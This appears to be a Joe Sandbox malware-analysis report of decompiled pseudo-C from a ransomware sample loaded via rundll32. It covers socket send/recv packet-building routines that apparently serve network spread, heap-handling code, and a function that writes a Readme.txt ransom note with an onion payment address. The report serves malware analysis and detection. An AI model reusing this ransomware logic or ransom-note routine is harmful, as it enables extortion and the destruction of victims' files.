Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
String ID: @
API String ID: 4137997400-2766056989
Opcode ID: 5ad4bb6ea0d1bcd3d581b9cdfbf7e636038483307bb9473ca133824891ae0e85
Instruction ID: b7b3c037973d03566775d18ff34cba47e0b4a4126a0dcafac7a145a07fdb7abd
Opcode Fuzzy Hash: 5ad4bb6ea0d1bcd3d581b9cdfbf7e636038483307bb9473ca133824891ae0e85
Instruction Fuzzy Hash: A85126B1508305AFD320AF65D848FABBBECFB88758F144A29F594D21A0EB34C905CB57

Uniqueness

Uniqueness Score: -1.00%

Function 007B41E9 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 443
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E007B41E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, signed short _a12, intOrPtr* _a16) {
				char _v5;
				void* _v12;
				signed int _v16;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v36;
				void* __ebx;
				signed int _t178;
				intOrPtr _t182;
				void* _t190;
				int _t193;
				void* _t196;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t218;
				intOrPtr _t219;
				intOrPtr _t220;
				void* _t227;
				void _t231;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t240;
				intOrPtr _t241;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				void* _t247;
				signed short _t249;
				signed int _t251;
				intOrPtr _t254;
				signed int _t255;
				signed short _t257;
				void* _t258;
				void* _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t266;
				void* _t268;
				intOrPtr* _t277;
				void* _t278;
				intOrPtr* _t279;
				void* _t303;
				signed short _t305;

				_t268 = __edx;
				_t247 = __ecx;
				_v5 = 0;
				_t303 = HeapAlloc(GetProcessHeap(), 8, 0x100);
				_v12 = _t303;
				if(_t303 == 0) {
					L36:
					return _v5;
				}
				_t277 = _a16;
				 *((char*)(_t303 + 2)) = 1;
				asm("cdq");
				asm("adc edx, [ebx+0x14]");
				if(E007B40E3( *_t277, _t247, _a4,  *_a8, ( *( *_t277 + 0x5d) & 0x000000ff) +  *((intOrPtr*)( *_t277 + 0x10)), _t268, _t303, 2) == 0) {
					L35:
					HeapFree(GetProcessHeap(), 8, _t303);
					goto L36;
				}
				_v16 = _v16 & 0x00000000;
				if(E007B3D0D(_t247, _t268, _a4, _a8, _a12,  *((intOrPtr*)( *_t277 + 0x10)),  *((intOrPtr*)( *_t277 + 0x14)),  &_v16, 0x100, _t277) == 0) {
					goto L35;
				}
				_t178 =  *( *_t277 + 0x5c) & 0x000000ff;
				_t248 = _v16;
				_t231 =  *(_t248 + _t178);
				_v24 =  *((intOrPtr*)(_t178 + _t248 + 4));
				HeapFree(GetProcessHeap(), 8, _t248);
				_t182 =  *_t277;
				if( *((char*)(_t182 + 0x66)) == 0) {
					_t249 =  *(_t182 + 0x64) & 0x000000ff;
					_a12 = _t249;
					if(0 >= _t249) {
						L40:
						if(E007B40E3(_t182, _a8, _a4,  *_a8, _t231, _v24, _t303, _a12) != 0) {
							_v5 = 1;
						}
						goto L35;
					}
					_t278 = 0;
					_t251 = _t249 & 0x0000ffff;
					do {
						 *(_t278 + _t303 + 1) =  !( *(_t278 +  *((intOrPtr*)(_t182 + 0x60))));
						_t278 = _t278 + 1;
						_t251 = _t251 - 1;
					} while (_t251 != 0);
					goto L40;
				} else {
					_t184 =  *((intOrPtr*)(_t182 + 0x65));
					if( *((intOrPtr*)(_t182 + 0x65)) != 0) {
						asm("cdq");
						asm("adc edx, [ebp-0x14]");
						_t248 =  &_v16;
						if(E007B3D0D( &_v16, _t268, _a4, _a8, _a12, (_t184 & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
							_t231 = 0;
							_v24 = 0;
						} else {
							_t227 = _v16;
							_t248 =  *(_t227 + 4);
							_t231 =  *_t227;
							_v24 =  *(_t227 + 4);
							HeapFree(GetProcessHeap(), 8, _t227);
						}
					}
					if(_t231 != 0 || _v24 != _t231) {
						asm("cdq");
						asm("adc edx, [ebp-0x14]");
						if(E007B3D0D(_t248, _t268, _a4, _a8, _a12, ( *( *_t277 + 0x66) & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
							goto L35;
						}
						_t190 = _v16;
						_t233 =  *_t190;
						_v36 =  *_t190;
						_v32 =  *((intOrPtr*)(_t190 + 4));
						HeapFree(GetProcessHeap(), 8, _t190);
						_t253 =  *_t277;
						_t193 = 0x100;
						if(0 ==  *((intOrPtr*)( *_t277))) {
							_t193 = 0x200;
						}
						if(E007B3D0D(_t253, 0, _a4, _a8, _a12, _t233, _v32,  &_v16, _t193, _t277) == 0) {
							goto L35;
						} else {
							_t254 =  *_t277;
							_t196 = _v16;
							_t255 =  *(_t254 + 0x68) & 0x000000ff;
							_t234 =  *((intOrPtr*)(_t196 + _t255));
							_a12 =  *(_t196 + ( *(_t254 + 0x67) & 0x000000ff));
							_v28 = _t234;
							_v24 =  *((intOrPtr*)(_t255 + _t196 + 4));
							HeapFree(GetProcessHeap(), 8, _t196);
							memset(_t303, 0, 0x100);
							if(_a12 == 0) {
								goto L35;
							}
							_t279 =  *_t277;
							_t257 = _a12;
							_v16 = _t279;
							if(1 !=  *_t279) {
								_t258 = _t257 - 1;
								if(_t258 == 0) {
									_a12 = 1;
									_t235 = _t234 + 0x10;
									asm("adc eax, edx");
									 *(_t303 + 5) = _v24;
									_push(0x1c);
									L30:
									 *((intOrPtr*)(_t303 + 1)) = _t235;
									L31:
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_pop(_t305);
									_t281 = _a8;
									_t260 = _a12;
									 *((_t305 & 0x0000ffff) + _v12 + 1 + 4) = _a12;
									asm("cdq");
									asm("adc edx, [ebp-0x1c]");
									if(E007B40E3(_v16, _a12, _a4,  *_a8, ( *(_v16 + 0x67) & 0x000000ff) + _v36, 0, (_t305 & 0x0000ffff) + _v12 + 1 + 3, 4) != 0 && E007B40E3( *_a16, _t260, _a4,  *_t281, _v28, _v24, _v12, _t305) != 0) {
										_v5 = 1;
									}
									_t303 = _v12;
									goto L35;
								}
								_t261 = _t258 - 1;
								_t211 = _t234;
								if(_t261 == 0) {
									_t262 = _v24;
									_t212 = _t211 + 0x20;
									 *((intOrPtr*)(_t303 + 1)) = _t212;
									asm("adc ecx, edx");
									 *(_t303 + 5) = _t262;
									 *((intOrPtr*)(_t303 + 0x11)) = _t212 + 0xc;
									 *((char*)(_t303 + 0x19)) = 0xe;
									asm("adc ecx, edx");
									 *(_t303 + 0x15) = _t262;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_a12 = 2;
									asm("movsd");
									_push(0x3c);
								} else {
									_t264 = _v24;
									if(_t261 == 1) {
										_t214 = _t211 + 0x30;
										 *((intOrPtr*)(_t303 + 1)) = _t214;
										asm("adc ecx, edx");
										 *(_t303 + 5) = _t264;
										 *((char*)(_t303 + 0x19)) = 0xe;
										_t215 = _t214 + 0xc;
										 *((intOrPtr*)(_t303 + 0x11)) = _t215;
										asm("adc ecx, edx");
										 *(_t303 + 0x15) = _t264;
										 *((char*)(_t303 + 0x29)) = 7;
										 *((intOrPtr*)(_t303 + 0x21)) = _t215 + 0x10;
										asm("adc ecx, edx");
										 *(_t303 + 0x25) = _t264;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_a12 = 3;
										_push(0x58);
									} else {
										_t218 = _t211 + 0x40;
										 *((intOrPtr*)(_t303 + 1)) = _t218;
										asm("adc ecx, edx");
										 *(_t303 + 5) = _t264;
										 *((char*)(_t303 + 0x19)) = 0xe;
										_t219 = _t218 + 0xc;
										 *((intOrPtr*)(_t303 + 0x11)) = _t219;
										asm("adc ecx, edx");
										 *(_t303 + 0x15) = _t264;
										 *((char*)(_t303 + 0x29)) = 7;
										_t220 = _t219 + 0x10;
										 *((intOrPtr*)(_t303 + 0x21)) = _t220;
										asm("adc ecx, edx");
										 *(_t303 + 0x25) = _t264;
										 *((char*)(_t303 + 0x39)) = 7;
										 *((intOrPtr*)(_t303 + 0x31)) = _t220 + 0xc;
										asm("adc ecx, edx");
										 *(_t303 + 0x35) = _t264;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_a12 = 4;
										_push(0x74);
									}
								}
								goto L31;
							}
							_t265 = _t257 - 1;
							if(_t265 == 0) {
								_a12 = 1;
								_t235 = _t234 + 8;
								_push(0x14);
								goto L30;
							}
							_t266 = _t265 - 1;
							if(_t266 == 0) {
								_t238 = _t234 + 0x10;
								 *((intOrPtr*)(_t303 + 1)) = _t238;
								 *((char*)(_t303 + 0xd)) = 0xe;
								 *((intOrPtr*)(_t303 + 9)) = _t238 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_a12 = 2;
								asm("movsd");
								_push(0x2c);
							} else {
								if(_t266 == 1) {
									_t240 = _t234 + 0x18;
									 *((intOrPtr*)(_t303 + 1)) = _t240;
									 *((char*)(_t303 + 0xd)) = 0xe;
									_t241 = _t240 + 0xc;
									 *((intOrPtr*)(_t303 + 9)) = _t241;
									 *(_t303 + 0x15) = 7;
									 *((intOrPtr*)(_t303 + 0x11)) = _t241 + 0x10;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_a12 = 3;
									_push(0x40);
								} else {
									_t243 = _t234 + 0x20;
									 *((intOrPtr*)(_t303 + 1)) = _t243;
									 *((char*)(_t303 + 0xd)) = 0xe;
									_t244 = _t243 + 0xc;
									 *((intOrPtr*)(_t303 + 9)) = _t244;
									 *(_t303 + 0x15) = 7;
									_t245 = _t244 + 0x10;
									 *((intOrPtr*)(_t303 + 0x11)) = _t245;
									 *((char*)(_t303 + 0x1d)) = 7;
									 *((intOrPtr*)(_t303 + 0x19)) = _t245 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_a12 = 4;
									_push(0x54);
								}
							}
							goto L31;
						}
					} else {
						goto L35;
					}
				}
			}

0x007b41e9
0x007b41e9
0x007b41f9
0x007b420a
0x007b420c
0x007b4211
0x007b4679
0x007b4680
0x007b4680
0x007b4217
0x007b421c
0x007b4224
0x007b422a
0x007b423f
0x007b4669
0x007b4673
0x00000000
0x007b4673
0x007b4245
0x007b426b
0x00000000
0x00000000
0x007b4273
0x007b4277
0x007b427a
0x007b4284
0x007b428e
0x007b4294
0x007b429a
0x007b4683
0x007b4689
0x007b468f
0x007b46a6
0x007b46bf
0x007b46c1
0x007b46c1
0x00000000
0x007b46bf
0x007b4691
0x007b4693
0x007b4696
0x007b469e
0x007b46a2
0x007b46a3
0x007b46a3
0x00000000
0x007b42a0
0x007b42a0
0x007b42a5
0x007b42ad
0x007b42b0
0x007b42b3
0x007b42c9
0x007b42e8
0x007b42ea
0x007b42cb
0x007b42cb
0x007b42ce
0x007b42d1
0x007b42d6
0x007b42e0
0x007b42e0
0x007b42c9
0x007b42ef
0x007b4307
0x007b430a
0x007b431f
0x00000000
0x00000000
0x007b4325
0x007b4328
0x007b4330
0x007b4333
0x007b433d
0x007b4343
0x007b4347
0x007b434f
0x007b4351
0x007b4351
0x007b4370
0x00000000
0x007b4376
0x007b4376
0x007b437c
0x007b437f
0x007b4383
0x007b4390
0x007b4393
0x007b4396
0x007b43a0
0x007b43ae
0x007b43bb
0x00000000
0x00000000
0x007b43c1
0x007b43c3
0x007b43c9
0x007b43cf
0x007b44d1
0x007b44d2
0x007b45ef
0x007b45f5
0x007b45f8
0x007b45fa
0x007b4600
0x007b4602
0x007b4602
0x007b460a
0x007b4610
0x007b4611
0x007b4612
0x007b4613
0x007b4614
0x007b461e
0x007b4621
0x007b462e
0x007b4632
0x007b4643
0x007b4662
0x007b4662
0x007b4666
0x00000000
0x007b4666
0x007b44d8
0x007b44d9
0x007b44db
0x007b45b0
0x007b45b3
0x007b45b6
0x007b45b9
0x007b45bb
0x007b45c1
0x007b45c4
0x007b45cb
0x007b45cd
0x007b45d5
0x007b45d6
0x007b45d7
0x007b45e3
0x007b45ea
0x007b45eb
0x007b44e1
0x007b44e2
0x007b44e5
0x007b455a
0x007b455d
0x007b4560
0x007b4562
0x007b4565
0x007b4569
0x007b456c
0x007b4572
0x007b4574
0x007b4577
0x007b457e
0x007b4584
0x007b4586
0x007b458e
0x007b458f
0x007b4590
0x007b4599
0x007b459a
0x007b459b
0x007b459c
0x007b459d
0x007b45ac
0x007b44e7
0x007b44e7
0x007b44ea
0x007b44ed
0x007b44ef
0x007b44f2
0x007b44f6
0x007b44f9
0x007b44ff
0x007b4501
0x007b4504
0x007b4508
0x007b450b
0x007b450e
0x007b4510
0x007b4513
0x007b451a
0x007b4520
0x007b4522
0x007b452a
0x007b452b
0x007b452c
0x007b4535
0x007b4536
0x007b4537
0x007b4538
0x007b4541
0x007b4542
0x007b4543
0x007b4544
0x007b4553
0x007b4553
0x007b44e5
0x00000000
0x007b44db
0x007b43d5
0x007b43d6
0x007b44c1
0x007b44c4
0x007b44ca
0x00000000
0x007b44ca
0x007b43dc
0x007b43dd
0x007b448c
0x007b448f
0x007b4492
0x007b449c
0x007b44a4
0x007b44a5
0x007b44a6
0x007b44b2
0x007b44b9
0x007b44ba
0x007b43e3
0x007b43e7
0x007b4445
0x007b4448
0x007b444b
0x007b4452
0x007b4455
0x007b4458
0x007b445f
0x007b4467
0x007b4468
0x007b4469
0x007b4472
0x007b4473
0x007b4474
0x007b4475
0x007b4476
0x007b4485
0x007b43e9
0x007b43e9
0x007b43ec
0x007b43ef
0x007b43f6
0x007b43f9
0x007b43fc
0x007b4400
0x007b4403
0x007b4406
0x007b440d
0x007b4415
0x007b4416
0x007b4417
0x007b4420
0x007b4421
0x007b4422
0x007b4423
0x007b442c
0x007b442d
0x007b442e
0x007b442f
0x007b443e
0x007b443e
0x007b43e7
0x00000000
0x007b43dd
0x00000000
0x00000000
0x00000000
0x007b42ef

APIs

GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74654F20), ref: 007B41FD
HeapAlloc.KERNEL32(00000000), ref: 007B4204

Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40F8
Part of subcall function 007B40E3: HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40FB
Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B4148
Part of subcall function 007B40E3: HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B414B
Part of subcall function 007B40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B4184
Part of subcall function 007B40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,=B{,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B41BC
Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?), ref: 007B41CB
Part of subcall function 007B40E3: HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41CE
Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41D7
Part of subcall function 007B40E3: HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41DA

GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 007B4287
HeapFree.KERNEL32(00000000), ref: 007B428E
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 007B42D9
HeapFree.KERNEL32(00000000), ref: 007B42E0
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 007B4336
HeapFree.KERNEL32(00000000), ref: 007B433D
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74654F20,?,00000000,00000100,?), ref: 007B4399
HeapFree.KERNEL32(00000000), ref: 007B43A0
memset.MSVCRT ref: 007B43AE

Part of subcall function 007B3D0D: rand.MSVCRT ref: 007B3EC3
Part of subcall function 007B3D0D: memset.MSVCRT ref: 007B3EFC
Part of subcall function 007B3D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 007B3F38
Part of subcall function 007B3D0D: htons.WS2_32(?), ref: 007B3F5C

GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 007B466C
HeapFree.KERNEL32(00000000), ref: 007B4673

Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74654F20,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?), ref: 007B3D2B
Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D34
Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 007B3D46
Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D49
Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3D63
Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D66
Part of subcall function 007B3D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B4269,?,00000000,?,?,?), ref: 007B3E5B
Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3E65
Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3E68

Strings

6|, xrefs: 007B453C
6|, xrefs: 007B4480
Oet Uet0Xet, xrefs: 007B41FD, 007B4287, 007B42D9, 007B4336, 007B4399, 007B466C
6|, xrefs: 007B4427
6|, xrefs: 007B45A7

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
String ID: Oet Uet0Xet$6|$6|$6|$6|
API String ID: 2891003447-4284513384
Opcode ID: 5c6af463f525d632a111f1b0bf486a69f78f3696f37f54fadf1a5e648834a27c
Instruction ID: b7fcc98ec0954cab2b23bc0d6b301f08e80cff4fbd6f3e6c014eab7c160b612b
Opcode Fuzzy Hash: 5c6af463f525d632a111f1b0bf486a69f78f3696f37f54fadf1a5e648834a27c
Instruction Fuzzy Hash: A8F19C71904745AFDB11CF44C844FAABBB2BF4A304F09856DF949AB352C3B9EA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007B3071 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 95
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E007B3071(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void** _a16, int* _a20) {
				char _v5;
				void* _v12;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t40;
				signed int _t43;
				int _t48;
				int* _t60;

				_v5 = 0;
				_t25 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v12 = _t25;
				if(_t25 == 0) {
					L9:
					return _v5;
				}
				_t40 = HeapAlloc(GetProcessHeap(), 8, 0x3f);
				if(_t40 == 0) {
					L8:
					HeapFree(GetProcessHeap(), 8, _v12);
					goto L9;
				}
				_t43 = 9;
				_t31 = memcpy(_t40, _a8, _t43 << 2);
				__imp__#9(0x3b);
				 *(_t40 + 2) = _t31;
				 *((short*)(_t40 + 0x29)) = _a12;
				 *((char*)(_t40 + 8)) = 0x2e;
				 *((short*)(_t40 + 0x24)) = 0xff0c;
				 *((short*)(_t40 + 0x2f)) = 0xfde8;
				 *((short*)(_t40 + 0x31)) = 0xfde8;
				 *((short*)(_t40 + 0x37)) = 0xfde8;
				__imp__#19(_a4, _t40, 0x3f, 0);
				if(0xfde8 > 0) {
					__imp__#16(_a4, _v12, 0xffff, 0);
					_t60 = _a20;
					 *_t60 = 0xfde8;
					if(0xfde8 > 0 &&  *((intOrPtr*)(_v12 + 9)) == 0) {
						_t37 = HeapAlloc(GetProcessHeap(), 8, 0xfde8);
						 *_a16 = _t37;
						_t48 =  *_t60;
						if(_t48 != 0) {
							memcpy(_t37, _v12, _t48);
							_v5 = 1;
						}
					}
				}
				HeapFree(GetProcessHeap(), 8, _t40);
				goto L8;
			}

0x007b3085
0x007b3092
0x007b3094
0x007b3099
0x007b3173
0x007b3179
0x007b3179
0x007b30a9
0x007b30ad
0x007b3160
0x007b316c
0x00000000
0x007b3172
0x007b30b8
0x007b30bd
0x007b30bf
0x007b30c5
0x007b30d2
0x007b30e1
0x007b30e5
0x007b30eb
0x007b30ef
0x007b30f3
0x007b30f7
0x007b30ff
0x007b310d
0x007b3113
0x007b3116
0x007b311a
0x007b312e
0x007b3137
0x007b3139
0x007b313d
0x007b3144
0x007b314c
0x007b314c
0x007b313d
0x007b311a
0x007b315a
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,74654F20,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 007B3089
HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3092
GetProcessHeap.KERNEL32(00000008,0000003F,74655520,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A4
HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A7
htons.WS2_32(0000003B), ref: 007B30BF
send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 007B30F7
recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 007B310D
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3127
HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B312E
memcpy.MSVCRT ref: 007B3144
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3153
HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B315A
GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3165
HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B316C

Strings

Oet Uet0Xet, xrefs: 007B3127, 007B3153, 007B3165

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
String ID: Oet Uet0Xet
API String ID: 317911368-3175316637
Opcode ID: 155c1cc86d155ce7e2edc395b1ab9c2a40942e2eaf6273b9ea0a847328437d35
Instruction ID: d7bb88f1772e80d301d587fe6ddb38c9dd26ca4630438acb33d7b602f12f60fc
Opcode Fuzzy Hash: 155c1cc86d155ce7e2edc395b1ab9c2a40942e2eaf6273b9ea0a847328437d35
Instruction Fuzzy Hash: 8D319275500349BBDB205FA8DC49FAA7BADFF88304F158069FA04DB291EA758D40C729

Uniqueness

Uniqueness Score: -1.00%

Function 007B60F9 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B60F9(struct _OVERLAPPED* _a4) {
				long _v8;
				short _v528;
				short _v2088;
				void _v10280;
				signed int _t35;
				intOrPtr* _t54;
				void* _t63;
				void* _t65;
				intOrPtr _t67;
				intOrPtr* _t71;

				E007BA760(0x2824);
				wsprintfW( &_v528, L"%s", L"Readme.txt");
				_t71 = _a4;
				if(PathCombineW( &_v2088, _t71 + 4,  &_v528) != 0) {
					_t35 = E007B6477();
					if(_t35 != 0) {
						if(_t35 > 1) {
							_t35 = _t35 - 1;
						}
						if(WaitForMultipleObjects((0 |  *((intOrPtr*)(_t71 + 0x4c)) != 0x00000000) + 1, _t71 + 0x48, 0, _t35 * 0xea60) != 0) {
							_t63 = CreateFileW( &_v2088, 0x40000000, 0, 0, 1, 0, 0);
							if(_t63 != 0xffffffff) {
								_a4 = 0;
								if(E007B57E5( *((intOrPtr*)(_t71 + 0x38)),  *_t71, _t71 + 0xc,  &_a4) != 0) {
									memset( &_v10280, 0, 0x1000);
									StrCatW( &_v10280, L"Oops! Your files have been encrypted.\r\n\r\nIf you see this text, your files are no longer accessible.\r\nYou might have been looking for a way to recover your files.\r\nDon\'t waste your time. No one will be able to recover them without our\r\ndecryption service.\r\n\r\nWe  guarantee that you can recover all your files safely. All you\r\nneed to do is submit the payment and get the decryption password.\r\n\r\nVisit our web service at caforssztxqzf2nm.onion\r\n\r\nYour personal installation key#2:\r\n\r\n");
									StrCatW( &_v10280, _a4);
									_t54 =  &_v10280;
									_v8 = 0;
									_t65 = _t54 + 2;
									do {
										_t67 =  *_t54;
										_t54 = _t54 + 2;
									} while (_t67 != 0);
									if(WriteFile(_t63,  &_v10280, (_t54 - _t65 >> 1) + (_t54 - _t65 >> 1),  &_v8, 0) != 0) {
										FlushFileBuffers(_t63);
									}
									LocalFree(_a4);
								}
								CloseHandle(_t63);
							}
						}
					}
				}
				return 1;
			}

0x007b6101
0x007b6118
0x007b611e
0x007b613e
0x007b6145
0x007b614e
0x007b6157
0x007b6159
0x007b6159
0x007b6178
0x007b6197
0x007b619c
0x007b61ac
0x007b61b9
0x007b61c8
0x007b61e2
0x007b61ee
0x007b61f0
0x007b61f6
0x007b61f9
0x007b61fc
0x007b61fc
0x007b61ff
0x007b6202
0x007b6223
0x007b6226
0x007b6226
0x007b622f
0x007b622f
0x007b6236
0x007b6236
0x007b623c
0x007b6178
0x007b623d
0x007b6243

APIs

wsprintfW.USER32 ref: 007B6118
PathCombineW.SHLWAPI(?,?,?), ref: 007B6136

Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 007B6170
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 007B6191
memset.MSVCRT ref: 007B61C8
StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 007B61E2
StrCatW.SHLWAPI(?,?), ref: 007B61EE
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 007B621B
FlushFileBuffers.KERNEL32(00000000), ref: 007B6226
LocalFree.KERNEL32(?), ref: 007B622F
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B6236

Strings

pGdv0Hcv, xrefs: 007B61CD
Readme.txt, xrefs: 007B6107
Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 007B61D6

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
